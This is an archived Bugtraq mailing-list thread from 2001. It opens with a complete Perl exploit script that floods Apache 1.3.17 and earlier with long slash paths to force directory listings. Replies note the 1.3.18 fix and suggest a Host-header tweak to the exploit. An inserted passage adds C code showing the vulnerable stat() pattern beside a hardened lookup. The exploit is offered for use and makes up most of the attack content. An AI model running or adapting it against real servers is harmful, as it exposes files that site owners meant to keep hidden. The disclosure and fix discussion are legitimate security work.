6618149 2001-06-13 02:44 -0500 /123 lines/ Matt Watchinski <matt@farm9.com>
Sent by: joel@lysator.liu.se
Imported: 2001-06-13 21:25 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17406>
Subject: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
------------------------------------------------------------
From: Matt Watchinski <matt@farm9.com>
To: bugtraq@securityfocus.com
Message-ID: <3B2719E3.FA5BD8F4@farm9.com>
#!/usr/bin/perl
#
# farm9, Inc. (copyright 2001)
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info: This exploit tricks apache into returning an Index of a directory
# even if an index.html file is present. May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
# very specific cases would feed stat() a filename that was longer than
# stat() could handle. This would result in a condition where stat()
# would return 0 and a directory index would be returned instead of the
# default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */
#        if (stat(rnew->filename, &rnew->finfo) < 0) {     <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
# The directory must also have the following Options enabled:
# Indexes and MultiView
# Some OS's have different conditions on the number of character
# you have to pass to stat to make this work. If stat doesn't
# return 0 for path names less than 8192 or so internal apache
# buffer checks will stop this exploit from working.
#
# Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
# while i was trying to figure out what had to be enabled to make this
# exploit work. Also thanks to rfp for pointing out that MultiView
# needed to be enabled.
#
# More Greets: Jeff for not shooting me :) <All your Cisco's belong to us>
#              Anne for being so sexy <I never thought corporate espionage
#              would be so fun>
#              All my homies at farm9
#              DJ Charles / DJ NoloN for the phat beats
#              Marty (go go gadget snort)
#              All my ex-bees
#              RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up. Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#
use strict;
use warnings;
use IO::Socket;

my $low  = $ARGV[3];   # Low number of slash characters to try
my $hi   = $ARGV[2];   # High number of slash characters to try
my $port = $ARGV[1];   # Port to try to connect to
my $host = $ARGV[0];   # Host to try to connect to

# Main loop. Not much to this exploit once you figure out what needed to
# be enabled. Need to do some more testing on sub-dirs to see if it
# works with them. It should. Also different OS's might use a different number
# of /. Send me the numbers if you don't mind matt@farm9.com
while ($low <= $hi)
{
    my $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
                                       Proto => "TCP") or die "Connect Failed";
    my $url    = "GET ";
    my $buffer = "/" x $low . " HTTP/1.0\r\n";
    my $end    = "\r\n\r\n";
    $url = $url . $buffer . $end;
    print $socket "$url";
    while (<$socket>)
    {
        if ($_ =~ "Index of")
        {
            print "Found the magic number: $low\n";
            print "Now go do it by hand to see it all\n";
            close($socket);
            exit;
        }
    }
    close($socket);
    $low++;
}
(6618149) /Matt Watchinski <matt@farm9.com>/--------
6622519 2001-06-14 16:54 +0100 /37 lines/ Ben Laurie <ben@algroup.co.uk>
Sent by: joel@lysator.liu.se
Imported: 2001-06-14 21:34 by Brevbäraren
External recipient: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Recipient: Bugtraq (import) <17433>
Subject: Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
------------------------------------------------------------
From: Ben Laurie <ben@algroup.co.uk>
To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Message-ID: <3B28DE19.8DD74E6B@algroup.co.uk>
Matt Watchinski wrote:
> # Name: Apache Artificially Long Slash Path Directory Listing Exploit
> # Author: Matt Watchinski
> # Ref: SecurityFocus BID 2503
> #
> # Affects: Apache 1.3.17 and below
Doh! From apache 1.3.x CHANGES file:
Changes with Apache 1.3.18 [not released]
  *) SECURITY: The default installation could lead to mod_negotiation
     and mod_dir/mod_autoindex displaying a directory listing instead of
     the index.html.* files, if a very long path was created artificially
     by using many slashes. Now a 403 FORBIDDEN is returned.
     [Martin Kraemer]
Of course, 1.3.19 _was_ released. Ages ago.
Cheers,
Ben.
--
http://www.apache-ssl.org/ben.html
"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff
(6622519) /Ben Laurie <ben@algroup.co.uk>/----------
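The "Details" section of the original post and Ben Laurie's note on the 1.3.18 fix, as an added example that is not Apache's code or either poster's: it reproduces the stat() failure the quoted fragment folds into st_mode = 0, and beside it the check a hardened index lookup makes, treating only ENOENT as "candidate absent" and anything else as a hard failure (the 403 outcome the CHANGES entry describes). The enum and function names are hypothetical, the document root and slash count are constructed, and it assumes a POSIX stat() that reports ENAMETOOLONG for paths beyond PATH_MAX (4096 on Linux).

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Result of checking one DirectoryIndex candidate (hypothetical names). */
enum lookup_result { LOOKUP_FILE, LOOKUP_NOT_FOUND, LOOKUP_FORBIDDEN };

/* Pattern from the quoted 1.3.17 fragment: every stat() failure zeroes
 * st_mode, so ENAMETOOLONG is indistinguishable from "no index.html here"
 * and mod_dir falls through to the autoindex listing. */
static mode_t vulnerable_lookup(const char *filename)
{
    struct stat finfo;
    if (stat(filename, &finfo) < 0)
        finfo.st_mode = 0;
    return finfo.st_mode;
}

/* Hardened: only ENOENT means "candidate absent"; any other errno
 * (ENAMETOOLONG included) aborts the lookup, matching 1.3.18's choice of
 * answering 403 instead of listing the directory. */
static enum lookup_result hardened_lookup(const char *filename)
{
    struct stat finfo;
    if (stat(filename, &finfo) == 0)
        return LOOKUP_FILE;
    return (errno == ENOENT) ? LOOKUP_NOT_FOUND : LOOKUP_FORBIDDEN;
}

/* Build "<docroot>" + n slashes + "index.html": a constructed stand-in for
 * the filename the core hands to stat() for a many-slash URI. Caller frees. */
static char *make_slash_path(const char *docroot, size_t n)
{
    const char *leaf = "index.html";
    size_t dlen = strlen(docroot);
    char *p = malloc(dlen + n + strlen(leaf) + 1);
    if (p == NULL)
        return NULL;
    memcpy(p, docroot, dlen);
    memset(p + dlen, '/', n);
    strcpy(p + dlen + n, leaf);
    return p;
}
```

With 8192 slashes (comfortably past PATH_MAX) the vulnerable lookup reports st_mode 0, exactly what it reports for a genuinely missing index file, while the hardened one returns LOOKUP_FORBIDDEN.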
6626537 2001-06-15 14:48 +1200 /26 lines/ Stephen Cope <mail-d-20010615@kimihia.org.nz>
Sent by: joel@lysator.liu.se
Imported: 2001-06-15 18:00 by Brevbäraren
External recipient: Matt Watchinski <matt@farm9.com>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17444>
Comment on text 6618149 by Matt Watchinski <matt@farm9.com>
Subject: Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
------------------------------------------------------------
From: Stephen Cope <mail-d-20010615@kimihia.org.nz>
To: Matt Watchinski <matt@farm9.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010615144844.A20679@mess.kimihia.org.nz>
In my testing you need to take the Host header into account.
: $url = "GET ";
: $buffer = "/" x $low . " HTTP/1.0\r\n";
: $end = "\r\n\r\n";
The server I tested against uses mod_rewrite to do virtual hosting,
and it arrived at a different magic number with the host header, and
again without the header.
I made the following change to the above code:
$buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";
Should be fairly easy to understand.
--
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
(6626537) /Stephen Cope <mail-d-20010615@kimihia.org.nz>/(Rewrapped)
6626597 2001-06-14 18:44 -0700 /38 lines/ Peter Bierman <bierman@apple.com>
Sent by: joel@lysator.liu.se
Imported: 2001-06-15 18:15 by Brevbäraren
External recipient: Stefan Arentz <stefan.arentz@soze.com>
External CC recipient: BUGTRAQ@securityfocus.com
Recipient: Bugtraq (import) <17445>
Comment on text 6604222 by Stefan Arentz <stefan.arentz@soze.com>
Subject: Re: Mac OS X - Apache & Case Insensitive Filesystems
------------------------------------------------------------
From: Peter Bierman <bierman@apple.com>
To: Stefan Arentz <stefan.arentz@soze.com>
Cc: BUGTRAQ@securityfocus.com
Message-ID: <v03130307b74f18275a2f@[17.202.21.230]>
At 7:53 PM +0200 6/10/01, Stefan Arentz wrote:
>Preferred solution:
>
> Modification to Apache so that it does a check for the 'real'
> filename. This probably needs some support from the underlying
> operating system.
>
> Or Apple should submit their HFS+ patches to the Apache Software
> Foundation or install the mod_hfs_apple.so module on OS X Client.
From darwin-development@lists.apple.com:
The source code for the following software components which shipped
with Mac OS X Server 10.0 is available from
http://www.opensource.apple.com/projects/darwin/darwinserver/
MySQL 3.23.32
Samba 2.0.8
Tomcat 3.1
ApacheModules
- mod_auth_apple
- mod_hfs_apple
- mod_macbinary_apple
- mod_sherlock_apple
(I had nothing to do with the above, I'm only forwarding the info.)
-pmb
(6626597) /Peter Bierman <bierman@apple.com>/(Rewrapped)